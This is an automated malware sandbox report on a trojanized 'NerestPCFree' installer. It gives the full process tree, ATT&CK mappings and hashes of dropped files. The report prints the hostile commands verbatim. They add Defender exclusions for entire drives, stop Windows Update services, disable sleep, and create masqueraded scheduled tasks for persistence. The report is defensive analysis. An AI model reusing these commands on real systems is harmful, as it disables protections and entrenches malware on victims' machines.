C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2424
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2924
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3356
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3364 -
C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:1984
-
-
C:\fontwin\MsServerHost.exe"C:\fontwin/MsServerHost.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:1660 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lsdwy4t1\lsdwy4t1.cmdline"7⤵
- Drops file in System32 directory
PID:2468 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:4788
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFC3.tmp" "c:\Windows\System32\CSC32FC33ECE203443ABA9072655949BF63.TMP"8⤵PID:5000
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1012
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4072 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4736
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3076 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3052
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:688
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2788
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4988 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3040
-
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4988" "2128" "2084" "2132" "0" "0" "2136" "0" "0" "0" "0" "0"8⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5776
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3284 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2192
-
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3284" "2196" "2112" "2200" "0" "0" "2204" "0" "0" "0" "0" "0"8⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5828
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2604
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3488
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:696
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1124 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4332
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Cookies\unsecapp.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\serviced\WmiPrvSE.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:532
-
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4476" "2172" "2096" "2176" "0" "0" "2180" "0" "0" "0" "0" "0"8⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5588
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\Registry.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1860
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\services.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4588
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4208 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:856
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4420 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1jNuw3RpYi.bat"7⤵PID:3896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:1132
-
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:6032
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:624
-
-
C:\Recovery\WindowsRE\services.exe"C:\Recovery\WindowsRE\services.exe"8⤵PID:5828
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\twain32.exe"C:\Users\Admin\AppData\Local\Temp\twain32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4052
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3452
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3408
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4388
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:212
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4760
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4284 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3380
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2852
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4756 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4840
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3784
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1624
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3708
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3436
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1452
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1996
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:3252 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2864
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:4424
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:4960
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:1088
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:3032
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1112
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:244
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Modifies data under HKEY_USERS
PID:2140
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2068
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3536
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3720
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3876
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4888
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2676
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2236
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3680
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:3888
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5012
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Cookies\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Windows\Containers\serviced\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Java\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Java\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Java\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\services.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 13 /tr "'C:\fontwin\MsServerHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1164
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 11 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:5820
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:232
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD54bfce38f0cf1ebb4512ce24a15922934
SHA147254968ff47b9c3c4e286d7074a23bc3cbbcb66
SHA256c1f0849cc5ec9e12eb75af1350b985c9e237251f8a66e1b5b088451bf858689a
SHA51269830a1a09eed3b96d3fb7bf3898f57a3ba74701b807dba8a11c3b173d9a3d4bacd1dab58f9cbfa551f488d319037d08a7d542dae490baff52a8941a25042462
-
Filesize
48KB
MD50045722d631f04cc3f641d5faae0374b
SHA12438dbca544f8e246f40fd07fc396515695d1aaf
SHA256e4701ed12cbb85b3e83429ef5ad56da6f1366dc82437189394d3c4585f5918ac
SHA512998b99456e43a902a603b83cb3eb78642e3d70e11a00ecd2652d4983e31c675bc095d32b90c14951850e784669ad857d4e3f5c759a2f9bb6e5dd39a906875e5d
-
Filesize
13KB
MD57594ca366cef74ed2d9e25898a8d4612
SHA1732cb6b948c67c1da1c8263adbfddc24952f6054
SHA25641197ec59f9cd7ae93d7f34888511649330f0f895039ed9e5b0bc28a52e1215a
SHA512bb638a4177607dbe4a6d5c68a522c3f4dcdc003a09ddb532f9cd5580d488b5e1e8c26867cbc41dd1cd5c2a468d7950f1b4fb6de76e95845317c82989324ae84d
-
Filesize
48KB
MD515e3b78ce11c94f74873fa50121b4f63
SHA1ac983dbe3492f6b8ae355e7233fe1f44040a9507
SHA2564a91e93894623c8bf02b354641170a83d0a1685aa2c9a618c56bae54cce962db
SHA512d7d24a1b0b792b5132700df61794ff8e4f1686ee23362032b36e7bf93aeb84143a7fa4d1162f9f9acac9c0ba701aa40e7e660e885fe5d600b145615cbfac8ed3
-
Filesize
13KB
MD579565859437be9d1fcf7e496e10c325f
SHA1faf914e926b45cc36ef12ea52a69375b32361a0d
SHA256157bc1ae74b27e6a7356da6809f35d9deb58f3915841051b58c7f9b808322922
SHA512598df20f84ee4ca9876e214d63b47af718c319306300283708f99bad2d9fc62b9777eb62b0b878b39e4fd65069e6cd3a4e26f77c347c036bc5db3be5724d27b1
-
Filesize
13KB
MD5e86cf0df7234e4752be4b145d03511a4
SHA154fadec800a35e48bee9836439c24cfb44474df0
SHA256f67be851a26eedf032e5abe3dbe075a8e10e2d0bbfca9a21fc6a3d7a37485c2c
SHA5120c06a492fc3c23bff0cd466af88655e2b3a44c8309dfad765898980f30daa8ef0fca3b9ca991219be35779c650c7a4fa49c67d89c483e06327fb672bf9074170
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5d2fa367d9f7fae9ebddd3125b1b923ef
SHA100841e939427be8eee67afe2bdb2a9c5423fb48e
SHA256ecd21c0d206e5b082bb6c4c798bd05e1614d905107def73ab1159f270fd4abba
